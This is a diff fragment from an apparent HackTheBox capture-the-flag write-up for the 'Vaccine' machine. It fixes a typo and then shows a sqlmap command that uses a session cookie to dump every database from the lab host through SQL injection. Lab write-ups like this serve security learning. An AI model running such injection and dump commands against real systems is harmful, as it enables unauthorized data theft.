babbadeckl/HackTheBox-Writeups/Vaccine/README.md

 We now have access to the server!

-Btw, this all could be have also been done automatically by using `sqlmap`, but for the sake of learning: keep doing it manually!
+Btw, this all could have also been done automatically by using `sqlmap`, but for the sake of learning: keep doing it manually!

 ```
 $ sqlmap -u 'http://10.10.10.46/dashboard.php?search=a' --cookie="PHPSESSID=vmnafl0uct1r97s1k5bkpoiopg" --dump-all --tamper=space2comment